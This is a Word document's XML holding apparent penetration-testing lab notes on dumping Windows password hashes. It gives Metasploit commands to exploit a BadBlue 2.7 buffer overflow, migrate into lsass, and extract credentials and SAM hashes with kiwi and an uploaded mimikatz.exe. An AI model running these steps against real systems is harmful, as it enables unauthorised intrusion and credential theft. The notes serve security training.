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0E3E7" w14:textId="6770E655" w:rsidR="00853ABF" w:rsidRDefault="00CA33C8">
      <w:r w:rsidRPr="00CA33C8">
        <w:t xml:space="preserve">Dumping Hashes </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA33C8">
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA33C8">
        <w:t xml:space="preserve"> Mimikatz</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DBA07B" w14:textId="77777777" w:rsidR="00CA33C8" w:rsidRDefault="00CA33C8"/>
    <w:p w14:paraId="6D0D62C9" w14:textId="59C84815" w:rsidR="00CA33C8" w:rsidRDefault="008171EA">
      <w:r w:rsidRPr="008171EA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mimikatz:</w:t>
      </w:r>
      <w:r w:rsidRPr="008171EA">
        <w:t xml:space="preserve"> A Windows post-exploitation tool that extracts credentials, password hashes, and tokens from memory — used by security testers (and attackers) for credential harvesting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7280067D" w14:textId="270B07AD" w:rsidR="008171EA" w:rsidRDefault="008171EA">
      <w:r>
        <w:t>SAM= security account manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3913BC8F" w14:textId="7824774C" w:rsidR="008171EA" w:rsidRDefault="008171EA">
      <w:r>
        <w:t>Store user passwords and can be used to authenticate users both locally and remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17622F7D" w14:textId="77777777" w:rsidR="008171EA" w:rsidRDefault="008171EA"/>
    <w:p w14:paraId="7E6C4687" w14:textId="32E01DCA" w:rsidR="00094D6D" w:rsidRDefault="00094D6D">
      <w:r w:rsidRPr="00CA54B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>One way</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to execute it to drop it’s exe to the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699151B2" w14:textId="78840E7E" w:rsidR="00094D6D" w:rsidRPr="00CA54B1" w:rsidRDefault="00094D6D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA54B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Another:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099DD44E" w14:textId="53972110" w:rsidR="008171EA" w:rsidRDefault="00094D6D">
      <w:r>
        <w:t>Kiwi inbuilt meterpreter extension.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082677CD" w14:textId="4883E6DD" w:rsidR="00094D6D" w:rsidRDefault="00094D6D">
      <w:r>
        <w:t>Kiwi allow to execute mimikatz on the target.</w:t>
      </w:r>
      <w:r w:rsidR="006B34BA">
        <w:t xml:space="preserve"> (no touching the disk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383A2811" w14:textId="77777777" w:rsidR="006B34BA" w:rsidRDefault="006B34BA"/>
    <w:p w14:paraId="0EFAEFDF" w14:textId="748C85C2" w:rsidR="00CA54B1" w:rsidRPr="00CA54B1" w:rsidRDefault="00CA54B1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA54B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34393508" w14:textId="77777777" w:rsidR="00CA54B1" w:rsidRDefault="00CA54B1"/>
    <w:p w14:paraId="4909B8BF" w14:textId="10A23427" w:rsidR="00CA54B1" w:rsidRDefault="00080B17">
      <w:r>
        <w:t>Service postgresql start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5F464D" w14:textId="2D42E5F8" w:rsidR="00080B17" w:rsidRDefault="00080B17">
      <w:r>
        <w:t>Msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD29B22" w14:textId="75822942" w:rsidR="00080B17" w:rsidRDefault="00080B17">
      <w:r>
        <w:t>Workspace -a mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492CCD0C" w14:textId="4EEF95C1" w:rsidR="00080B17" w:rsidRDefault="00080B17">
      <w:r>
        <w:t>Setg RHOSTS target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3262B432" w14:textId="77777777" w:rsidR="00080B17" w:rsidRDefault="00080B17"/>
    <w:p w14:paraId="2C5AF849" w14:textId="3C75B649" w:rsidR="00080B17" w:rsidRDefault="00080B17">
      <w:r>
        <w:t>Db_nmap -sV target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2428E73C" w14:textId="77777777" w:rsidR="00080B17" w:rsidRDefault="00080B17"/>
    <w:p w14:paraId="1C599EE9" w14:textId="66461F01" w:rsidR="00080B17" w:rsidRDefault="00D44AB0">
      <w:r>
        <w:t>#badblue version 2.7 is vuln to buffer overflow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E798092" w14:textId="789F67D8" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0">
      <w:r>
        <w:t>Search badblue 2.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712DBB3B" w14:textId="431495CA" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0">
      <w:r>
        <w:t>Use(index no)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66921948" w14:textId="0C27E192" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AA7FE6" w14:textId="4E589FC1" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0">
      <w:r>
        <w:t xml:space="preserve">Set target </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F37A2F1" w14:textId="1E26F0E2" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t># show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607B7AC1" w14:textId="77777777" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0"/>
    <w:p w14:paraId="5A11319D" w14:textId="2E02AB35" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0">
      <w:r>
        <w:t>Set target badblue\ EE\ 2.7\ Universal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3023C56D" w14:textId="4EC70921" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6AE744" w14:textId="749E7324" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0">
      <w:r>
        <w:t># geet meterpreter session’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053E8A75" w14:textId="77777777" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0"/>
    <w:p w14:paraId="31EC37DB" w14:textId="593546A2" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0">
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1804DE83" w14:textId="58DAA3F4" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0">
      <w:r>
        <w:t>Ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421188E9" w14:textId="1A45D2BD" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0">
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B06BCE5" w14:textId="77777777" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0"/>
    <w:p w14:paraId="412999C2" w14:textId="50BE153A" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0">
      <w:r>
        <w:t>Pgrep lsass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09192883" w14:textId="4EF46B30" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0">
      <w:r>
        <w:t># search for specific process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF9E233" w14:textId="77777777" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0"/>
    <w:p w14:paraId="611A507F" w14:textId="33984F8C" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0">
      <w:r>
        <w:t>Migrate pid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC588E1" w14:textId="7F175EBD" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0">
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA83FAD" w14:textId="77777777" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0"/>
    <w:p w14:paraId="29176C88" w14:textId="04613C36" w:rsidR="007C6B02" w:rsidRDefault="007C6B02">
      <w:r>
        <w:t># we will only get the hashes and credentials of the actual users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B463B5" w14:textId="53BFB7FC" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0">
      <w:r>
        <w:t>Load kiwi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C4B2C2" w14:textId="3A22BDE0" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0">
      <w:r>
        <w:t>Help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74947D6D" w14:textId="499EEE59" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0">
      <w:r>
        <w:t># at the last after loading kiwi it’s help menu show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E18A1EF" w14:textId="77777777" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0"/>
    <w:p w14:paraId="0E333C45" w14:textId="0BA1D90B" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0">
      <w:r>
        <w:t>Creds_all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16552F52" w14:textId="149E9B9B" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0">
      <w:r>
        <w:t># dump all the credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FB563B" w14:textId="77777777" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0"/>
    <w:p w14:paraId="5C641535" w14:textId="10B67385" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0">
      <w:r>
        <w:t>Lsa_dump_sam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB26C61" w14:textId="214FA842" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0">
      <w:r>
        <w:t># dump sam database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B35BC01" w14:textId="09983049" w:rsidR="007C6B02" w:rsidRDefault="007C6B02">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Lsa_dump_s</w:t>
      </w:r>
      <w:r>
        <w:t>ecrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B69F278" w14:textId="4555810A" w:rsidR="007C6B02" w:rsidRDefault="007C6B02">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="003E0E67">
        <w:t>Get</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F200CB8" w14:textId="77777777" w:rsidR="007C6B02" w:rsidRDefault="007C6B02"/>
    <w:p w14:paraId="5F243A8D" w14:textId="77777777" w:rsidR="003E0E67" w:rsidRDefault="003E0E67"/>
    <w:p w14:paraId="743FBF6C" w14:textId="2EF3FBA4" w:rsidR="00021F89" w:rsidRDefault="00021F89">
      <w:r>
        <w:t>#transfer mimikat binary to target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A05F1D" w14:textId="14D800F9" w:rsidR="00021F89" w:rsidRDefault="00021F89">
      <w:r>
        <w:t>Upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFC1406" w14:textId="1F9BF82D" w:rsidR="00021F89" w:rsidRDefault="00021F89">
      <w:r>
        <w:t>#uploaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532B99DA" w14:textId="77777777" w:rsidR="00021F89" w:rsidRDefault="00021F89"/>
    <w:p w14:paraId="5F12CD9F" w14:textId="56FEC788" w:rsidR="00021F89" w:rsidRDefault="00021F89">
      <w:r>
        <w:t>Dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A57917" w14:textId="094367A4" w:rsidR="00021F89" w:rsidRDefault="00021F89">
      <w:r>
        <w:t>#shown here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620C3567" w14:textId="77777777" w:rsidR="00021F89" w:rsidRDefault="00021F89"/>
    <w:p w14:paraId="33F1F4BB" w14:textId="23879950" w:rsidR="00021F89" w:rsidRDefault="00021F89">
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769DCEE0" w14:textId="1772EE50" w:rsidR="00021F89" w:rsidRDefault="00021F89">
      <w:r>
        <w:t>#to run it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3C5D0F" w14:textId="3E4CA7C9" w:rsidR="00021F89" w:rsidRDefault="00021F89">
      <w:r>
        <w:t>.\mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F0F90A" w14:textId="7CC85C74" w:rsidR="00021F89" w:rsidRDefault="00021F89">
      <w:r>
        <w:t>Privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0047FF2B" w14:textId="236AF78D" w:rsidR="00021F89" w:rsidRDefault="00021F89">
      <w:r>
        <w:t xml:space="preserve">#show is we </w:t>
      </w:r>
      <w:r w:rsidR="0045774E">
        <w:t>have appropriate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> privs to dump the passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245CD67D" w14:textId="77777777" w:rsidR="00021F89" w:rsidRDefault="00021F89"/>
    <w:p w14:paraId="6502E1C4" w14:textId="63EAB34F" w:rsidR="00021F89" w:rsidRDefault="00021F89">
      <w:r>
        <w:t># dump logon password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F83840C" w14:textId="7D9395C6" w:rsidR="00021F89" w:rsidRDefault="00021F89">
      <w:r>
        <w:t>Sekurlsa::logonpasswords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0985314F" w14:textId="77777777" w:rsidR="00021F89" w:rsidRDefault="00021F89"/>
    <w:p w14:paraId="3621DF15" w14:textId="716501DB" w:rsidR="00D846E0" w:rsidRDefault="00D846E0">
      <w:r>
        <w:t>Lsadump::sam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAC2E5A" w14:textId="7577D5C6" w:rsidR="00D846E0" w:rsidRDefault="00D846E0">
      <w:r>
        <w:t>#dump content of sam database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7805AB2B" w14:textId="77777777" w:rsidR="002E1E16" w:rsidRDefault="002E1E16"/>
    <w:p w14:paraId="15136B85" w14:textId="25107781" w:rsidR="002E1E16" w:rsidRDefault="002E1E16">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E1E16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433940D2" w14:textId="6ECD744E" w:rsidR="002E1E16" w:rsidRPr="002E1E16" w:rsidRDefault="002E1E16">
      <w:r>
        <w:t>Recommended is kiwi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA58077" w14:textId="0B04DB13" w:rsidR="00094D6D" w:rsidRDefault="002E1E16">
      <w:r>
        <w:t>Kiwi commands are we simple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD7B702" w14:textId="573E0DCB" w:rsidR="0015735C" w:rsidRDefault="0015735C">
      <w:r w:rsidRPr="0015735C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>BadBlue:</w:t>
      </w:r>
      <w:r w:rsidRPr="0015735C">
        <w:t xml:space="preserve"> A lightweight Windows web server software that was later found vulnerable and often exploited for remote code execution or file disclosure attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225C463D" w14:textId="1C162544" w:rsidR="0015735C" w:rsidRDefault="0015735C">
      <w:r w:rsidRPr="0015735C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Syskey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0015735C">
        <w:br/>
        <w:t>Syskey (SAM Lock) was a Windows utility that protected the local SAM database by adding an extra encryption/boot-key layer</w:t>
      </w:r>
      <w:r w:rsidR="006924F5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00157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996"/>
    <w:rsid w:val="00021F89"/>
    <w:rsid w:val="00080B17"/>
    <w:rsid w:val="00094D6D"/>
    <w:rsid w:val="0015735C"/>
    <w:rsid w:val="002E19B5"/>
    <w:rsid w:val="002E1E16"/>
    <w:rsid w:val="003E0E67"/>
    <w:rsid w:val="0045774E"/>
    <w:rsid w:val="004B0D7C"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00633996"/>
    <w:rsid w:val="006924F5"/>
    <w:rsid w:val="006B34BA"/>
    <w:rsid w:val="007A1506"/>
    <w:rsid w:val="007C6B02"/>
    <w:rsid w:val="008171EA"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00932156"/>
    <w:rsid w:val="00CA33C8"/>
    <w:rsid w:val="00CA54B1"/>
    <w:rsid w:val="00D44AB0"/>
    <w:rsid w:val="00D846E0"/>
    <w:rsid w:val="00E06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02945"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4AAF1AA7-4C77-44B1-A155-0C3EF50D7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9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9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9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9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9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9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9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9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9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9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9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30</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-11T11:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-11T12:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>